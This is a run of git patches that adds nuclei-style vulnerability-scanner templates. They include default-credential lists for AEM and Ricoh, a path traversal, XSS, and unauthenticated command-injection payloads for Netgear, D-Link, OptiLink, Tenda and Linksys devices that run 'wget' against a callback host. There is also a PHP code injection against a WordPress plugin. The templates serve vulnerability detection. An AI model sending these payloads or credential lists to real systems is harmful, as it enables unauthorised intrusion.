From 34b611d9614b91c6cb405cfd39465bee8e721fa2 Mon Sep 17 00:00:00 2001 From: Robert Wiggins <51722811+RandomRobbieBF@users.noreply.github.com> Date: Wed, 23 Jun 2021 09:04:06 +0100 Subject: [PATCH 001/132] Create adobe-aem-default-credentials.yaml --- .../aem/adobe-aem-default-credentials.yaml | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 default-logins/aem/adobe-aem-default-credentials.yaml diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml new file mode 100644 index 0000000000..6dbc3a84d3 --- /dev/null +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -0,0 +1,65 @@ +id: adobe-aem-default-credentials + +info: + name: Adobe AEM Default Credentials + author: random-robbie + severity: critical + tags: aem,default-login + reference: + +requests: + + - payloads: + + rr_username: + - admin + - grios + - replication-receiver + - vgnadmin + - aparker@geometrixx.info + - jdoe@geometrixx.info + - james.devore@spambob.com + - matt.monroe@mailinator.com + - aaron.mcdonald@mailinator.com + - jason.werner@dodgit.com + + rr_password: + - admin + - password + - replication-receiver + - vgnadmin + - aparker + - jdoe + - password + - password + - password + - password + + attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + + raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/plain, */*; q=0.01 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Content-Length: 67 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + Connection: close + + _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true + + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: word + part: header + words: + - crx From 18796b5bba2b607603449bf868f39d91db79063e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 24 Jun 2021 00:40:11 +0530 Subject: [PATCH 003/132] Update adobe-aem-default-credentials.yaml --- default-logins/aem/adobe-aem-default-credentials.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 6dbc3a84d3..2ec85a21ac 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -5,12 +5,12 @@ info: author: random-robbie severity: critical tags: aem,default-login - reference: + reference: requests: - payloads: - + rr_username: - admin - grios @@ -36,7 +36,7 @@ requests: - password attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb - + raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -52,7 +52,7 @@ requests: Connection: close _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true - + matchers-condition: and matchers: - type: status From 33a879e9d575d2ae0414599d58b3d737dedb0ffe Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 25 Jun 2021 00:12:06 +0530 Subject: [PATCH 004/132] updated attack type --- default-logins/aem/adobe-aem-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 2ec85a21ac..b6aacc7e67 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -35,7 +35,7 @@ requests: - password - password - attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb raw: - | From 9d8f8f8589491b7fea7cdcd5f4dd51437d6341cc Mon Sep 17 00:00:00 2001 From: Robbie Date: Wed, 30 Jun 2021 11:50:41 +0100 Subject: [PATCH 005/132] Create CVE-2013-3827.yaml --- cves/2013/CVE-2013-3827.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2013/CVE-2013-3827.yaml diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml new file mode 100644 index 0000000000..d8465e8d2c --- /dev/null +++ b/cves/2013/CVE-2013-3827.yaml @@ -0,0 +1,27 @@ +id: CVE-2013-3827 + +info: + name: CVE-2013-3827 + author: Random-Robbie + severity: medium + description: Javafaces LFI + +requests: + - method: GET + path: + - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" + - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + matchers-condition: and + matchers: + - type: word + words: + - "web-app version" + part: body From 3802723219b997cecd1d3e4011eef255f3f8fddf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 30 Jun 2021 23:39:47 +0530 Subject: [PATCH 006/132] Update CVE-2013-3827.yaml --- cves/2013/CVE-2013-3827.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index d8465e8d2c..af44677113 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -5,6 +5,7 @@ info: author: Random-Robbie severity: medium description: Javafaces LFI + tags: cve,cve2013,lfi requests: - method: GET From 3c2971b09a8e64c57fe106aedd1918bd43a7d04e Mon Sep 17 00:00:00 2001 From: Ivanov Vladimir Date: Tue, 6 Jul 2021 13:39:45 +0300 Subject: [PATCH 007/132] Add sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 40 ++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 technologies/sap-igs-detect.yaml diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml new file mode 100644 index 0000000000..e4a882b009 --- /dev/null +++ b/technologies/sap-igs-detect.yaml @@ -0,0 +1,40 @@ +id: sap-igs-detect + +info: + name: SAP Internet Graphics Server (IGS) Detection + author: _generic_human_ + description: Detection of SAP Internet Graphics Server (IGS) + severity: info + tags: sap,webserver,igs + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SAP IGS" + - "is running" + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "SAP Internet Graphics Server" + condition: and + + extractors: + - type: kval + part: header + kval: + - "Server" From 4326841cb4321e7fe1cf6d3b821818dcc6fbeb2e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 8 Jul 2021 14:43:40 +0530 Subject: [PATCH 008/132] Update sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml index e4a882b009..bab13679aa 100644 --- a/technologies/sap-igs-detect.yaml +++ b/technologies/sap-igs-detect.yaml @@ -5,7 +5,7 @@ info: author: _generic_human_ description: Detection of SAP Internet Graphics Server (IGS) severity: info - tags: sap,webserver,igs + tags: sap,tech,igs requests: - method: GET From adc16e4bdfb637e018cac986b4dec4caa5e927f5 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 11 Jul 2021 13:26:49 +0900 Subject: [PATCH 009/132] Create ricoh-weak-password.yaml Signed-off-by: GwanYeong Kim --- default-logins/ricoh/ricoh-weak-password.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 default-logins/ricoh/ricoh-weak-password.yaml diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml new file mode 100644 index 0000000000..a7db0ce8a6 --- /dev/null +++ b/default-logins/ricoh/ricoh-weak-password.yaml @@ -0,0 +1,28 @@ +id: ricoh-weak-password + +info: + name: Ricoh Weak Password + author: gy741 + severity: high + tags: ricoh,default-login + reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ + +requests: + - raw: + - | + POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: cookieOnOffChecker=on; + + wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open= + + matchers-condition: and + matchers: + - type: regex + regex: + - 'wimsesid=[0-9]+' + part: header + + - type: status + status: + - 302 From b3766162cc0e17343bc48d1a542167e93a8000d8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 06:19:57 +0700 Subject: [PATCH 010/132] Create CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2012/CVE-2012-1835.yaml diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml new file mode 100644 index 0000000000..284837442b --- /dev/null +++ b/cves/2012/CVE-2012-1835.yaml @@ -0,0 +1,33 @@ +id: CVE-2012-1835 + +info: + name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 67ae44be04b4af872489bc9ee6602e7726a3186b Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 10:54:56 +0900 Subject: [PATCH 011/132] Create CVE-2020-26919.yaml it was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-26919.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2020/CVE-2020-26919.yaml diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml new file mode 100644 index 0000000000..fffb1e22e4 --- /dev/null +++ b/cves/2020/CVE-2020-26919.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-26919 + +info: + name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. + reference: | + - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,netgear,rce + +requests: + - raw: + - | + POST /login.htm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1af27d9260266eb7e5f27382a832ede96cbae7ef Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 09:41:14 +0700 Subject: [PATCH 012/132] Create CVE-2016-10960.yaml --- CVE-2016-10960.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 CVE-2016-10960.yaml diff --git a/CVE-2016-10960.yaml b/CVE-2016-10960.yaml new file mode 100644 index 0000000000..3110e9b2eb --- /dev/null +++ b/CVE-2016-10960.yaml @@ -0,0 +1,25 @@ +id: CVE-2016-10960 + +info: + name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + author: daffainfo + severity: critical + description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + tags: cve,cve2016,wordpress,wp-plugin,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" + body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="' + + matchers-condition: and + matchers: + - type: word + words: + - "Hello, world." + condition: and + - type: status + status: + - 200 From a3699d912a2df739e796877ce6109c3b905b5281 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 14:28:14 +0900 Subject: [PATCH 013/132] Create CVE-2020-25506.yaml The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-25506.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2020/CVE-2020-25506.yaml diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml new file mode 100644 index 0000000000..21a5709c95 --- /dev/null +++ b/cves/2020/CVE-2020-25506.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-25506 + +info: + name: D-Link DNS-320 - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + reference: | + - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,dlink,rce + +requests: + - raw: + - | + POST /cgi-bin/system_mgr.cgi? HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + + - | + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: */* + Connection: close + + unsafe: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1eb999ce02d5cc8fd72cd9647d141f1dc7ac866c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 14:57:34 +0900 Subject: [PATCH 014/132] Create optiLink-ont1gew-gpon-rce.yaml vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- .../other/optiLink-ont1gew-gpon-rce.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml diff --git a/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml new file mode 100644 index 0000000000..799426dc22 --- /dev/null +++ b/vulnerabilities/other/optiLink-ont1gew-gpon-rce.yaml @@ -0,0 +1,35 @@ +id: optiLink-ont1gew-gpon-rce + +info: + name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution + author: gy741 + severity: critical + description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + reference: | + - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: optiLink,rce,oob + +requests: + - raw: + - | + POST /boaform/admin/formTracert HTTP/1.1 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Origin: http://{{Hostname}} + Connection: keep-alive + Referer: http://{{Hostname}}/diag_ping_admin_en.asp + Upgrade-Insecure-Requests: 1 + Host: {{Hostname}} + User: e8c + Password: e8c + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + + target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 1c729ab1ea5c4f2480a2d3088e22611613cd1e74 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 15:09:26 +0900 Subject: [PATCH 015/132] Create CVE-2021-31755.yaml Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-31755.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-31755.yaml diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml new file mode 100644 index 0000000000..d1d4550b3f --- /dev/null +++ b/cves/2021/CVE-2021-31755.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-31755 + +info: + name: Tenda Router AC11 RCE + description: Vulnerabilities in the web-based management interface of enda Router AC11 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: | + - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 + - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai + tags: cve,cve2021,tenda,rce,oob + +requests: + - raw: + - | + POST /goform/setmac HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/index.htmlr + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Content-Type: application/x-www-form-urlencoded + + module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From fb1f67ce26b0176e87ccc0ceb861d178c31ab398 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 14:21:17 +0530 Subject: [PATCH 016/132] Rename CVE-2016-10960.yaml to cves/2016/CVE-2016-10960.yaml --- CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml (100%) diff --git a/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml similarity index 100% rename from CVE-2016-10960.yaml rename to cves/2016/CVE-2016-10960.yaml From f8f9f539eaff7a24b30af2aa2404e0b1f76230ec Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 15 Jul 2021 18:10:11 +0900 Subject: [PATCH 017/132] Create CVE-2020-35713.yaml Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-35713.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2020/CVE-2020-35713.yaml diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml new file mode 100644 index 0000000000..7e3e77e0b3 --- /dev/null +++ b/cves/2020/CVE-2020-35713.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-35713 + +info: + name: Linksys RE6500 Pre-Auth RCE + author: gy741 + severity: critical + reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html + description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + tags: cve,cve2020,linksys,rce,oob + +requests: + - raw: + - | + POST /goform/setSysAdm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Origin: http://{{Hostname}} + Referer: http://{{Hostname}}/login.shtml + + admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From a13090dd4bf6706f241bfc33fb7e839162d653c9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:01:21 +0530 Subject: [PATCH 018/132] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 284837442b..8bb63f3f98 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -4,6 +4,7 @@ info: name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 tags: cve,cve2012,wordpress,xss,wp-plugin From 321fcfdac18772e49e5bbef147710878d48d0e76 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:05:55 +0530 Subject: [PATCH 019/132] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 8bb63f3f98..e88b0cf14b 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: From ee1719ee26c086eaf80d548299dbd8437c27488b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 15 Jul 2021 15:07:53 +0530 Subject: [PATCH 020/132] Update CVE-2012-1835.yaml --- cves/2012/CVE-2012-1835.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index e88b0cf14b..25c8832501 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml @@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' +# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: From 8a28dc19356679e00bd410e4db4650c1cb180d9e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 15 Jul 2021 19:30:44 +0700 Subject: [PATCH 021/132] Create CVE-2019-16525.yaml --- cves/2019/CVE-2019-16525.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-16525.yaml diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml new file mode 100644 index 0000000000..23b3cdac75 --- /dev/null +++ b/cves/2019/CVE-2019-16525.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-16525 + +info: + name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 + tags: cve,cve2019,wordpress,xss,wp-plugin + 